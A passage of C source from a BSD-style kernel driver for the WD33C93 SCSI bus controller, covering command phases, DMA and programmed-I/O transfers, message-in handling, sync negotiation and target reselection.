cmd"); #if 0 GET_SBIC_csr(regs, csr); /* Lets us reload tcount */ WAIT_CIP(regs); GET_SBIC_asr(regs, asr); CSR_TRACE('I',csr,asr,target); if( asr & (SBIC_ASR_BSY|SBIC_ASR_LCI|SBIC_ASR_CIP) ) printf("next: cmd sent asr %02x, csr %02x\n", asr, csr); #endif break; #if 0 case SBIC_CSR_XFERRED|DATA_OUT_PHASE: case SBIC_CSR_XFERRED|DATA_IN_PHASE: case SBIC_CSR_MIS|DATA_OUT_PHASE: case SBIC_CSR_MIS|DATA_IN_PHASE: case SBIC_CSR_MIS_1|DATA_OUT_PHASE: case SBIC_CSR_MIS_1|DATA_IN_PHASE: case SBIC_CSR_MIS_2|DATA_OUT_PHASE: case SBIC_CSR_MIS_2|DATA_IN_PHASE: if (acb->sc_kv.dc_count <= 0) i = sbicabort(dev, regs, "icmd out of data"); else { wait = sbic_data_wait; if (sbicxfstart(regs, acb->sc_kv.dc_count, SBIC_PHASE(csr), wait)) if (csr & 0x01) /* data in? */ i=sbicxfin(regs, acb->sc_kv.dc_count, acb->sc_kv.dc_addr); else i=sbicxfout(regs, acb->sc_kv.dc_count, acb->sc_kv.dc_addr, SBIC_PHASE(csr)); acb->sc_kv.dc_addr += (acb->sc_kv.dc_count - i); acb->sc_kv.dc_count = i; i = 1; } break; #endif case SBIC_CSR_XFERRED|STATUS_PHASE: case SBIC_CSR_MIS|STATUS_PHASE: case SBIC_CSR_MIS_1|STATUS_PHASE: case SBIC_CSR_MIS_2|STATUS_PHASE: /* * the sbic does the status/cmd-complete reading ok, * so do this with its hi-level commands. */ #ifdef DEBUG if(sbic_debug) printf("SBICICMD status phase\n"); #endif SBIC_TC_PUT(regs, 0); SET_SBIC_cmd_phase(regs, 0x46); SET_SBIC_cmd(regs, SBIC_CMD_SEL_ATN_XFER); break; #if THIS_IS_A_RESERVED_STATE case BUS_FREE_PHASE: /* This is not legal */ if( dev->sc_stat[0] != 0xff ) goto out; break; #endif default: i = sbicnextstate(dev, csr, asr); } /* * make sure the last command was taken, * ie. we're not hunting after an ignored command.. */ GET_SBIC_asr(regs, asr); /* tapes may take a loooong time.. */ while (asr & SBIC_ASR_BSY){ if(asr & SBIC_ASR_DBR) { printf("sbicicmd: Waiting while sbic is jammed, CSR:%02x,ASR:%02x\n", csr,asr); #ifdef DDB Debugger(); #endif /* SBIC is jammed */ /* DUNNO which direction */ /* Try old direction */ GET_SBIC_data(regs,i); GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR) /* Wants us to write */ SET_SBIC_data(regs,i); } GET_SBIC_asr(regs, asr); } /* * wait for last command to complete */ if (asr & SBIC_ASR_LCI) { printf("sbicicmd: last command ignored\n"); } else if( i == 1 ) /* Bsy */ SBIC_WAIT (regs, SBIC_ASR_INT, wait); /* * do it again */ } while ( i > 0 && dev->sc_stat[0] == 0xff); /* Sometimes we need to do an extra read of the CSR */ GET_SBIC_csr(regs, csr); CSR_TRACE('I',csr,asr,0xff); #if CSR_LOG_BUF_SIZE if(reselect_debug>1) for(i=0; i<bufptr; i++) printf("CSR:%02x", csrbuf[i]); #endif #ifdef DEBUG if(data_pointer_debug > 1) printf("sbicicmd done(%d,%d):%d =%d=\n", dev->target, lun, acb->sc_kv.dc_count, dev->sc_stat[0]); #endif QPRINTF(("=STS:%02x=", dev->sc_stat[0])); dev->sc_flags &= ~SBICF_ICMD; SBIC_TRACE(dev); return(dev->sc_stat[0]); } /* * Finish SCSI xfer command: After the completion interrupt from * a read/write operation, sequence through the final phases in * programmed i/o. This routine is a lot like sbicicmd except we * skip (and don't allow) the select, cmd out and data in/out phases. */ void sbicxfdone(dev, regs, target) struct sbic_softc *dev; sbic_regmap_p regs; int target; { u_char phase, asr, csr; int s; SBIC_TRACE(dev); QPRINTF(("{")); s = splbio(); /* * have the sbic complete on its own */ SBIC_TC_PUT(regs, 0); SET_SBIC_cmd_phase(regs, 0x46); SET_SBIC_cmd(regs, SBIC_CMD_SEL_ATN_XFER); do { asr = SBIC_WAIT (regs, SBIC_ASR_INT, 0); GET_SBIC_csr (regs, csr); CSR_TRACE('f',csr,asr,target); QPRINTF(("%02x:", csr)); } while ((csr != SBIC_CSR_DISC) && (csr != SBIC_CSR_DISC_1) && (csr != SBIC_CSR_S_XFERRED)); dev->sc_flags &= ~SBICF_SELECTED; GET_SBIC_cmd_phase (regs, phase); QPRINTF(("}%02x", phase)); if (phase == 0x60) GET_SBIC_tlun(regs, dev->sc_stat[0]); else sbicerror(dev, regs, csr); QPRINTF(("=STS:%02x=\n", dev->sc_stat[0])); splx(s); SBIC_TRACE(dev); } /* * No DMA chains */ int sbicgo(dev, xs) struct sbic_softc *dev; struct scsipi_xfer *xs; { int i, dmaflags, count, usedma; /* int wait;*/ /* u_char cmd;*/ u_char *addr, asr = 0, csr = 0; sbic_regmap_p regs; struct sbic_acb *acb; SBIC_TRACE(dev); dev->target = xs->sc_link->scsipi_scsi.target; dev->lun = xs->sc_link->scsipi_scsi.lun; acb = dev->sc_nexus; regs = dev->sc_sbicp; usedma = sbicdmaok(dev, xs); #ifdef DEBUG routine = 1; debug_sbic_regs = regs; /* store this to allow debug calls */ if( data_pointer_debug > 1 ) printf("sbicgo(%d,%d)\n", dev->target, dev->lun); #endif /* * set the sbic into DMA mode */ if( usedma ) SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI | SBIC_MACHINE_DMA_MODE); else SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI); /* * select the SCSI bus (it's an error if bus isn't free) */ if (sbicselectbus(dev, regs, dev->target, dev->lun, dev->sc_scsiaddr)) { /* printf("sbicgo: Trying to select busy bus!\n"); */ SBIC_TRACE(dev); return(0); /* Not done: needs to be rescheduled */ } dev->sc_stat[0] = 0xff; /* * Calculate DMA chains now */ dmaflags = 0; if (acb->flags & ACB_DATAIN) dmaflags |= DMAGO_READ; /* * Deal w/bounce buffers. */ addr = acb->sc_kv.dc_addr; count = acb->sc_kv.dc_count; #if 0 /* mark */ if (count && (char *)kvtop(addr) != acb->sc_pa.dc_addr) { /* XXXX check */ printf("sbic: DMA buffer mapping changed %x->%x\n", acb->sc_pa.dc_addr, kvtop(addr)); #ifdef DDB Debugger(); #endif } #endif #ifdef DEBUG ++sbicdma_ops; /* count total DMA operations */ #endif if (usedma) panic("sbic: Cannot use DMA\n"); #if 0 if (count && usedma && dev->sc_flags & SBICF_BADDMA && sbiccheckdmap(addr, count, dev->sc_dmamask)) { /* * need to bounce the dma. */ if (dmaflags & DMAGO_READ) { acb->flags |= ACB_BBUF; acb->sc_dmausrbuf = addr; acb->sc_dmausrlen = count; acb->sc_usrbufpa = (u_char *)kvtop(addr); if(!dev->sc_tinfo[dev->target].bounce) { printf("sbicgo: HELP! no bounce allocated for %d\n", dev->target); printf("xfer: (%p->%p,%lx)\n", acb->sc_dmausrbuf, acb->sc_usrbufpa, acb->sc_dmausrlen); dev->sc_tinfo[xs->sc_link->target].bounce = (char *)alloc_z2mem(MAXPHYS); if (isztwomem(dev->sc_tinfo[xs->sc_link->target].bounce)) printf("alloc ZII target %d bounce pa 0x%x\n", xs->sc_link->target, kvtop(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)); else if (dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce) printf("alloc CHIP target %d bounce pa 0x%x\n", xs->sc_link->scsipi_scsi.target, PREP_DMA_MEM(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)); printf("Allocating %d bounce at %x\n", dev->target, kvtop(dev->sc_tinfo[dev->target].bounce)); } } else { /* write: copy to dma buffer */ #ifdef DEBUG if(data_pointer_debug) printf("sbicgo: copying %x bytes to target %d bounce %x\n", count, dev->target, kvtop(dev->sc_tinfo[dev->target].bounce)); #endif bcopy (addr, dev->sc_tinfo[dev->target].bounce, count); } addr = dev->sc_tinfo[dev->target].bounce;/* and use dma buffer */ acb->sc_kv.dc_addr = addr; #ifdef DEBUG ++sbicdma_bounces; /* count number of bounced */ #endif } #endif /* * Allocate the DMA chain */ /* Set start KVM addresses */ #if 0 acb->sc_kv.dc_addr = addr; acb->sc_kv.dc_count = count; #endif /* Mark end of segment */ acb->sc_tcnt = dev->sc_tcnt = 0; acb->sc_pa.dc_count = 0; sbic_load_ptrs(dev, regs, dev->target, dev->lun); SBIC_TRACE(dev); /* Enable interrupts but don't do any DMA */ dev->sc_enintr(dev); if (usedma) { dev->sc_tcnt = dev->sc_dmago(dev, acb->sc_pa.dc_addr, acb->sc_pa.dc_count, dmaflags); #ifdef DEBUG dev->sc_dmatimo = dev->sc_tcnt ? 1 : 0; #endif } else dev->sc_dmacmd = 0; /* Don't use DMA */ dev->sc_flags |= SBICF_INDMA; /* SBIC_TC_PUT(regs, dev->sc_tcnt);*/ /* XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX */ SBIC_TRACE(dev); sbic_save_ptrs(dev, regs, dev->target, dev->lun); /* * push the data cache ( I think this won't work (EH)) */ #if defined(M68040) if (mmutype == MMU_68040 && usedma && count) { dma_cachectl(addr, count); if (((u_int)addr & 0xF) || (((u_int)addr + count) & 0xF)) dev->sc_flags |= SBICF_DCFLUSH; } #endif /* * enintr() also enables interrupts for the sbic */ #ifdef DEBUG if( data_pointer_debug > 1 ) printf("sbicgo dmago:%d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr,dev->sc_tcnt); debug_asr = asr; debug_csr = csr; #endif /* * Lets cycle a while then let the interrupt handler take over */ asr = GET_SBIC_asr(regs, asr); do { GET_SBIC_csr(regs, csr); CSR_TRACE('g',csr,asr,dev->target); #ifdef DEBUG debug_csr = csr; routine = 1; #endif QPRINTF(("go[0x%x]", csr)); i = sbicnextstate(dev, csr, asr); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); #ifdef DEBUG debug_asr = asr; #endif if(asr & SBIC_ASR_LCI) printf("sbicgo: LCI asr:%02x csr:%02x\n", asr,csr); } while( i == SBIC_STATE_RUNNING && asr & (SBIC_ASR_INT|SBIC_ASR_LCI) ); CSR_TRACE('g',csr,asr,i<<4); SBIC_TRACE(dev); if (i == SBIC_STATE_DONE && dev->sc_stat[0] == 0xff) printf("sbicgo: done & stat = 0xff\n"); if (i == SBIC_STATE_DONE && dev->sc_stat[0] != 0xff) { /* if( i == SBIC_STATE_DONE && dev->sc_stat[0] ) { */ /* Did we really finish that fast? */ return 1; } return 0; } int sbicintr(dev) struct sbic_softc *dev; { sbic_regmap_p regs; /* struct dma_chain *df, *dl;*/ u_char asr, csr; /* u_char *tmpaddr;*/ /* struct sbic_acb *acb;*/ int i; /* int newtarget, newlun;*/ /* unsigned tcnt;*/ regs = dev->sc_sbicp; /* * pending interrupt? */ GET_SBIC_asr (regs, asr); if ((asr & SBIC_ASR_INT) == 0) return(0); SBIC_TRACE(dev); do { GET_SBIC_csr(regs, csr); CSR_TRACE('i',csr,asr,dev->target); #ifdef DEBUG debug_csr = csr; routine = 2; #endif QPRINTF(("intr[0x%x]", csr)); i = sbicnextstate(dev, csr, asr); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); #ifdef DEBUG debug_asr = asr; #endif #if 0 if(asr & SBIC_ASR_LCI) printf("sbicintr: LCI asr:%02x csr:%02x\n", asr,csr); #endif } while(i == SBIC_STATE_RUNNING && asr & (SBIC_ASR_INT|SBIC_ASR_LCI)); CSR_TRACE('i',csr,asr,i<<4); SBIC_TRACE(dev); return(1); } /* * Run commands and wait for disconnect */ int sbicpoll(dev) struct sbic_softc *dev; { sbic_regmap_p regs; u_char asr, csr; /* struct sbic_pending* pendp;*/ int i; /* unsigned tcnt;*/ SBIC_TRACE(dev); regs = dev->sc_sbicp; do { GET_SBIC_asr (regs, asr); #ifdef DEBUG debug_asr = asr; #endif GET_SBIC_csr(regs, csr); CSR_TRACE('p',csr,asr,dev->target); #ifdef DEBUG debug_csr = csr; routine = 2; #endif QPRINTF(("poll[0x%x]", csr)); i = sbicnextstate(dev, csr, asr); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); /* tapes may take a loooong time.. */ while (asr & SBIC_ASR_BSY){ if(asr & SBIC_ASR_DBR) { printf("sbipoll: Waiting while sbic is jammed, CSR:%02x,ASR:%02x\n", csr,asr); #ifdef DDB Debugger(); #endif /* SBIC is jammed */ /* DUNNO which direction */ /* Try old direction */ GET_SBIC_data(regs,i); GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR) /* Wants us to write */ SET_SBIC_data(regs,i); } GET_SBIC_asr(regs, asr); } if(asr & SBIC_ASR_LCI) printf("sbicpoll: LCI asr:%02x csr:%02x\n", asr,csr); else if( i == 1 ) /* BSY */ SBIC_WAIT(regs, SBIC_ASR_INT, sbic_cmd_wait); } while(i == SBIC_STATE_RUNNING); CSR_TRACE('p',csr,asr,i<<4); SBIC_TRACE(dev); return(1); } /* * Handle a single msgin */ int sbicmsgin(dev) struct sbic_softc *dev; { sbic_regmap_p regs; int recvlen; u_char asr, csr, *tmpaddr; regs = dev->sc_sbicp; dev->sc_msg[0] = 0xff; dev->sc_msg[1] = 0xff; GET_SBIC_asr(regs, asr); #ifdef DEBUG if(reselect_debug>1) printf("sbicmsgin asr=%02x\n", asr); #endif sbic_save_ptrs(dev, regs, dev->target, dev->lun); GET_SBIC_selid (regs, csr); SET_SBIC_selid (regs, csr | SBIC_SID_FROM_SCSI); SBIC_TC_PUT(regs, 0); tmpaddr = dev->sc_msg; recvlen = 1; do { while( recvlen-- ) { asr = GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); QPRINTF(("sbicmsgin ready to go (csr,asr)=(%02x,%02x)\n", csr, asr)); RECV_BYTE(regs, *tmpaddr); CSR_TRACE('m',csr,asr,*tmpaddr); #if 1 /* * get the command completion interrupt, or we * can't send a new command (LCI) */ SBIC_WAIT(regs, SBIC_ASR_INT, 0); GET_SBIC_csr(regs, csr); CSR_TRACE('X',csr,asr,dev->target); #else WAIT_CIP(regs); do { GET_SBIC_asr(regs, asr); csr = 0xff; GET_SBIC_csr(regs, csr); CSR_TRACE('X',csr,asr,dev->target); if( csr == 0xff ) printf("sbicmsgin waiting: csr %02x asr %02x\n", csr, asr); } while( csr == 0xff ); #endif #ifdef DEBUG if(reselect_debug>1) printf("sbicmsgin: got %02x csr %02x asr %02x\n", *tmpaddr, csr, asr); #endif #if do_parity_check if( asr & SBIC_ASR_PE ) { printf ("Parity error"); /* This code simply does not work. */ WAIT_CIP(regs); SET_SBIC_cmd(regs, SBIC_CMD_SET_ATN); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); WAIT_CIP(regs); SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); WAIT_CIP(regs); if( !(asr & SBIC_ASR_LCI) ) /* Target wants to send garbled msg*/ continue; printf("--fixing\n"); /* loop until a msgout phase occurs on target */ while(csr & 0x07 != MESG_OUT_PHASE) { while( asr & SBIC_ASR_BSY && !(asr & SBIC_ASR_DBR|SBIC_ASR_INT) ) GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR ) panic("msgin: jammed again!\n"); GET_SBIC_csr(regs, csr); CSR_TRACE('e',csr,asr,dev->target); if( csr & 0x07 != MESG_OUT_PHASE ) { sbicnextstate(dev, csr, asr); sbic_save_ptrs(dev, regs, dev->target, dev->lun); } } /* Should be msg out by now */ SEND_BYTE(regs, MSG_PARITY_ERROR); } else #endif tmpaddr++; if(recvlen) { /* Clear ACK */ WAIT_CIP(regs); GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); CSR_TRACE('X',csr,asr,dev->target); QPRINTF(("sbicmsgin pre byte CLR_ACK (csr,asr)=(%02x,%02x)\n", csr, asr)); SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); SBIC_WAIT(regs, SBIC_ASR_INT, 0); } }; if(dev->sc_msg[0] == 0xff) { printf("sbicmsgin: sbic swallowed our message\n"); break; } #ifdef DEBUG if (sync_debug) printf("msgin done csr 0x%x asr 0x%x msg 0x%x\n", csr, asr, dev->sc_msg[0]); #endif /* * test whether this is a reply to our sync * request */ if (MSG_ISIDENTIFY(dev->sc_msg[0])) { QPRINTF(("IFFY")); #if 0 /* There is an implied load-ptrs here */ sbic_load_ptrs(dev, regs, dev->target, dev->lun); #endif /* Got IFFY msg -- ack it */ } else if (dev->sc_msg[0] == MSG_REJECT && dev->sc_sync[dev->target].state == SYNC_SENT) { QPRINTF(("REJECT of SYN")); #ifdef DEBUG if (sync_debug) printf("target %d rejected sync, going async\n", dev->target); #endif dev->sc_sync[dev->target].period = sbic_min_period; dev->sc_sync[dev->target].offset = 0; dev->sc_sync[dev->target].state = SYNC_DONE; SET_SBIC_syn(regs, SBIC_SYN(dev->sc_sync[dev->target].offset, dev->sc_sync[dev->target].period)); } else if ((dev->sc_msg[0] == MSG_REJECT)) { QPRINTF(("REJECT")); /* * we'll never REJECt a REJECT message.. */ } else if ((dev->sc_msg[0] == MSG_SAVE_DATA_PTR)) { QPRINTF(("MSG_SAVE_DATA_PTR")); /* * don't reject this either. */ } else if ((dev->sc_msg[0] == MSG_DISCONNECT)) { QPRINTF(("DISCONNECT")); #ifdef DEBUG if( reselect_debug>1 && dev->sc_msg[0] == MSG_DISCONNECT ) printf("sbicmsgin: got disconnect msg %s\n", (dev->sc_flags & SBICF_ICMD)?"rejecting":""); #endif if( dev->sc_flags & SBICF_ICMD ) { /* We're in immediate mode. Prevent disconnects. */ /* prepare to reject the message, NACK */ SET_SBIC_cmd(regs, SBIC_CMD_SET_ATN); WAIT_CIP(regs); } } else if (dev->sc_msg[0] == MSG_CMD_COMPLETE ) { QPRINTF(("CMD_COMPLETE")); /* !! KLUDGE ALERT !! quite a few drives don't seem to * really like the current way of sending the * sync-handshake together with the ident-message, and * they react by sending command-complete and * disconnecting right after returning the valid sync * handshake. So, all I can do is reselect the drive, * and hope it won't disconnect again. I don't think * this is valid behavior, but I can't help fixing a * problem that apparently exists. * * Note: we should not get here on `normal' command * completion, as that condition is handled by the * high-level sel&xfer resume command used to walk * thru status/cc-phase. */ #ifdef DEBUG if (sync_debug) printf ("GOT MSG %d! target %d acting weird.." " waiting for disconnect...\n", dev->sc_msg[0], dev->target); #endif /* Check to see if sbic is handling this */ GET_SBIC_asr(regs, asr); if(asr & SBIC_ASR_BSY) return SBIC_STATE_RUNNING; /* Let's try this: Assume it works and set status to 00 */ dev->sc_stat[0] = 0; } else if (dev->sc_msg[0] == MSG_EXT_MESSAGE && tmpaddr == &dev->sc_msg[1]) { QPRINTF(("ExtMSG\n")); /* Read in whole extended message */ SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); SBIC_WAIT(regs, SBIC_ASR_INT, 0); GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); QPRINTF(("CLR ACK asr %02x, csr %02x\n", asr, csr)); RECV_BYTE(regs, *tmpaddr); CSR_TRACE('x',csr,asr,*tmpaddr); /* Wait for command completion IRQ */ SBIC_WAIT(regs, SBIC_ASR_INT, 0); recvlen = *tmpaddr++; QPRINTF(("Recving ext msg, asr %02x csr %02x len %02x\n", asr, csr, recvlen)); } else if (dev->sc_msg[0] == MSG_EXT_MESSAGE && dev->sc_msg[1] == 3 && dev->sc_msg[2] == MSG_SYNC_REQ) { QPRINTF(("SYN")); dev->sc_sync[dev->target].period = sbicfromscsiperiod(dev, regs, dev->sc_msg[3]); dev->sc_sync[dev->target].offset = dev->sc_msg[4]; dev->sc_sync[dev->target].state = SYNC_DONE; SET_SBIC_syn(regs, SBIC_SYN(dev->sc_sync[dev->target].offset, dev->sc_sync[dev->target].period)); printf("%s: target %d now synchronous," " period=%dns, offset=%d.\n", dev->sc_dev.dv_xname, dev->target, dev->sc_msg[3] * 4, dev->sc_msg[4]); } else { #ifdef DEBUG if (sbic_debug || sync_debug) printf ("sbicmsgin: Rejecting message 0x%02x\n", dev->sc_msg[0]); #endif /* prepare to reject the message, NACK */ SET_SBIC_cmd(regs, SBIC_CMD_SET_ATN); WAIT_CIP(regs); } /* Clear ACK */ WAIT_CIP(regs); GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); CSR_TRACE('X',csr,asr,dev->target); QPRINTF(("sbicmsgin pre CLR_ACK (csr,asr)=(%02x,%02x)%d\n", csr, asr, recvlen)); SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); SBIC_WAIT(regs, SBIC_ASR_INT, 0); } #if 0 while((csr == SBIC_CSR_MSGIN_W_ACK) || (SBIC_PHASE(csr) == MESG_IN_PHASE)); #else while (recvlen>0); #endif QPRINTF(("sbicmsgin finished: csr %02x, asr %02x\n",csr, asr)); /* Should still have one CSR to read */ return SBIC_STATE_RUNNING; } /* * sbicnextstate() * return: * 0 == done * 1 == working * 2 == disconnected * -1 == error */ int sbicnextstate(dev, csr, asr) struct sbic_softc *dev; u_char csr, asr; { sbic_regmap_p regs; /* struct dma_chain *df, *dl;*/ struct sbic_acb *acb; /* int i;*/ int newtarget, newlun, wait; /* unsigned tcnt;*/ SBIC_TRACE(dev); regs = dev->sc_sbicp; acb = dev->sc_nexus; QPRINTF(("next[%02x,%02x]",asr,csr)); switch (csr) { case SBIC_CSR_XFERRED|CMD_PHASE: case SBIC_CSR_MIS|CMD_PHASE: case SBIC_CSR_MIS_1|CMD_PHASE: case SBIC_CSR_MIS_2|CMD_PHASE: sbic_save_ptrs(dev, regs, dev->target, dev->lun); if (sbicxfstart(regs, acb->clen, CMD_PHASE, sbic_cmd_wait)) if (sbicxfout(regs, acb->clen, &acb->cmd, CMD_PHASE)) goto abort; break; case SBIC_CSR_XFERRED|STATUS_PHASE: case SBIC_CSR_MIS|STATUS_PHASE: case SBIC_CSR_MIS_1|STATUS_PHASE: case SBIC_CSR_MIS_2|STATUS_PHASE: /* * this should be the normal i/o completion case. * get the status & cmd complete msg then let the * device driver look at what happened. */ sbicxfdone(dev,regs,dev->target); /* * check for overlapping cache line, flush if so */ #ifdef M68040 if (dev->sc_flags & SBICF_DCFLUSH) { #if 0 printf("sbic: 68040 DMA cache flush needs fixing? %x:%x\n", dev->sc_xs->data, dev->sc_xs->datalen); #endif } #endif #ifdef DEBUG if( data_pointer_debug > 1 ) printf("next dmastop: %d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr,dev->sc_tcnt); dev->sc_dmatimo = 0; #endif dev->sc_dmastop(dev); /* was dmafree */ if (acb->flags & ACB_BBUF) { if ((u_char *)kvtop(acb->sc_dmausrbuf) != acb->sc_usrbufpa) printf("%s: WARNING - buffer mapping changed %p->%x\n", dev->sc_dev.dv_xname, acb->sc_usrbufpa, kvtop(acb->sc_dmausrbuf)); #ifdef DEBUG if(data_pointer_debug) printf("sbicgo:copying %lx bytes from target %d bounce %x\n", acb->sc_dmausrlen, dev->target, kvtop(dev->sc_tinfo[dev->target].bounce)); #endif bcopy(dev->sc_tinfo[dev->target].bounce, acb->sc_dmausrbuf, acb->sc_dmausrlen); } dev->sc_flags &= ~(SBICF_INDMA | SBICF_DCFLUSH); sbic_scsidone(acb, dev->sc_stat[0]); SBIC_TRACE(dev); return SBIC_STATE_DONE; case SBIC_CSR_XFERRED|DATA_OUT_PHASE: case SBIC_CSR_XFERRED|DATA_IN_PHASE: case SBIC_CSR_MIS|DATA_OUT_PHASE: case SBIC_CSR_MIS|DATA_IN_PHASE: case SBIC_CSR_MIS_1|DATA_OUT_PHASE: case SBIC_CSR_MIS_1|DATA_IN_PHASE: case SBIC_CSR_MIS_2|DATA_OUT_PHASE: case SBIC_CSR_MIS_2|DATA_IN_PHASE: { int i = 0; if( dev->sc_xs->flags & SCSI_POLL || dev->sc_flags & SBICF_ICMD || acb->sc_dmacmd == 0 ) { /* Do PIO */ SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI); if (acb->sc_kv.dc_count <= 0) { printf("sbicnextstate:xfer count %d asr%x csr%x\n", acb->sc_kv.dc_count, asr, csr); goto abort; } wait = sbic_data_wait; if( sbicxfstart(regs, acb->sc_kv.dc_count, SBIC_PHASE(csr), wait)) if( SBIC_PHASE(csr) == DATA_IN_PHASE ) /* data in? */ i=sbicxfin(regs, acb->sc_kv.dc_count, acb->sc_kv.dc_addr); else i=sbicxfout(regs, acb->sc_kv.dc_count, acb->sc_kv.dc_addr, SBIC_PHASE(csr)); acb->sc_kv.dc_addr += (acb->sc_kv.dc_count - i); acb->sc_kv.dc_count = i; } else { if (acb->sc_kv.dc_count <= 0) { printf("sbicnextstate:xfer count %d asr%x csr%x\n", acb->sc_kv.dc_count, asr, csr); goto abort; } /* * do scatter-gather dma * hacking the controller chip, ouch.. */ SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI | SBIC_MACHINE_DMA_MODE); /* * set next dma addr and dec count */ #if 0 SBIC_TC_GET(regs, tcnt); dev->sc_cur->dc_count -= ((dev->sc_tcnt - tcnt) >> 1); dev->sc_cur->dc_addr += (dev->sc_tcnt - tcnt); dev->sc_tcnt = acb->sc_tcnt = tcnt; #else sbic_save_ptrs(dev, regs, dev->target, dev->lun); sbic_load_ptrs(dev, regs, dev->target, dev->lun); #endif #ifdef DEBUG if( data_pointer_debug > 1 ) printf("next dmanext: %d(%p:%lx)\n", dev->target,dev->sc_cur->dc_addr, dev->sc_tcnt); dev->sc_dmatimo = 1; #endif dev->sc_tcnt = dev->sc_dmanext(dev); SBIC_TC_PUT(regs, (unsigned)dev->sc_tcnt); SET_SBIC_cmd(regs, SBIC_CMD_XFER_INFO); dev->sc_flags |= SBICF_INDMA; } break; } case SBIC_CSR_XFERRED|MESG_IN_PHASE: case SBIC_CSR_MIS|MESG_IN_PHASE: case SBIC_CSR_MIS_1|MESG_IN_PHASE: case SBIC_CSR_MIS_2|MESG_IN_PHASE: SBIC_TRACE(dev); return sbicmsgin(dev); case SBIC_CSR_MSGIN_W_ACK: SET_SBIC_cmd(regs, SBIC_CMD_CLR_ACK); /* Dunno what I'm ACKing */ printf("Acking unknown msgin CSR:%02x",csr); break; case SBIC_CSR_XFERRED|MESG_OUT_PHASE: case SBIC_CSR_MIS|MESG_OUT_PHASE: case SBIC_CSR_MIS_1|MESG_OUT_PHASE: case SBIC_CSR_MIS_2|MESG_OUT_PHASE: #ifdef DEBUG if (sync_debug) printf ("sending REJECT msg to last msg.\n"); #endif sbic_save_ptrs(dev, regs, dev->target, dev->lun); /* * should only get here on reject, * since it's always US that * initiate a sync transfer */ SEND_BYTE(regs, MSG_REJECT); WAIT_CIP(regs); if( asr & (SBIC_ASR_BSY|SBIC_ASR_LCI|SBIC_ASR_CIP) ) printf("next: REJECT sent asr %02x\n", asr); SBIC_TRACE(dev); return SBIC_STATE_RUNNING; case SBIC_CSR_DISC: case SBIC_CSR_DISC_1: dev->sc_flags &= ~(SBICF_INDMA|SBICF_SELECTED); /* Try to schedule another target */ #ifdef DEBUG if(reselect_debug>1) printf("sbicnext target %d disconnected\n", dev->target); #endif TAILQ_INSERT_HEAD(&dev->nexus_list, acb, chain); ++dev->sc_tinfo[dev->target].dconns; dev->sc_nexus = NULL; dev->sc_xs = NULL; if((acb->xs->flags & SCSI_POLL) || (dev->sc_flags & SBICF_ICMD) || (!sbic_parallel_operations) ) { SBIC_TRACE(dev); return SBIC_STATE_DISCONNECT; } sbic_sched(dev); SBIC_TRACE(dev); return SBIC_STATE_DISCONNECT; case SBIC_CSR_RSLT_NI: case SBIC_CSR_RSLT_IFY: GET_SBIC_rselid(regs, newtarget); /* check SBIC_RID_SIV? */ newtarget &= SBIC_RID_MASK; if (csr == SBIC_CSR_RSLT_IFY) { /* Read IFY msg to avoid lockup */ GET_SBIC_data(regs, newlun); WAIT_CIP(regs); newlun &= SBIC_TLUN_MASK; CSR_TRACE('r',csr,asr,newtarget); } else { /* Need to get IFY message */ for (newlun = 256; newlun; --newlun) { GET_SBIC_asr(regs, asr); if (asr & SBIC_ASR_INT) break; delay(1); } newlun = 0; /* XXXX */ if ((asr & SBIC_ASR_INT) == 0) { #ifdef DEBUG if (reselect_debug) printf("RSLT_NI - no IFFY message? asr %x\n", asr); #endif } else { GET_SBIC_csr(regs,csr); CSR_TRACE('n',csr,asr,newtarget); if ((csr == (SBIC_CSR_MIS|MESG_IN_PHASE)) || (csr == (SBIC_CSR_MIS_1|MESG_IN_PHASE)) || (csr == (SBIC_CSR_MIS_2|MESG_IN_PHASE))) { sbicmsgin(dev); newlun = dev->sc_msg[0] & 7; } else { printf("RSLT_NI - not MESG_IN_PHASE %x\n", csr); } } } #ifdef DEBUG if(reselect_debug>1 || (reselect_debug && csr==SBIC_CSR_RSLT_NI)) printf("sbicnext: reselect %s from targ %d lun %d\n", csr == SBIC_CSR_RSLT_NI ? "NI" : "IFY", newtarget, newlun); #endif if (dev->sc_nexus) { #ifdef DEBUG if (reselect_debug > 1) printf("%s: reselect %s with active command\n", dev->sc_dev.dv_xname, csr == SBIC_CSR_RSLT_NI ? "NI" : "IFY"); #ifdef DDB /* Debugger();*/ #endif #endif TAILQ_INSERT_HEAD(&dev->ready_list, dev->sc_nexus, chain); dev->sc_tinfo[dev->target].lubusy &= ~(1 << dev->lun); dev->sc_nexus = NULL; dev->sc_xs = NULL; } /* Reload sync values for this target */ if (dev->sc_sync[newtarget].state == SYNC_DONE) SET_SBIC_syn(regs, SBIC_SYN (dev->sc_sync[newtarget].offset, dev->sc_sync[newtarget].period)); else SET_SBIC_syn(regs, SBIC_SYN (0, sbic_min_period)); for (acb = dev->nexus_list.tqh_first; acb; acb = acb->chain.tqe_next) { if (acb->xs->sc_link->scsipi_scsi.target != newtarget || acb->xs->sc_link->scsipi_scsi.lun != newlun) continue; TAILQ_REMOVE(&dev->nexus_list, acb, chain); dev->sc_nexus = acb; dev->sc_xs 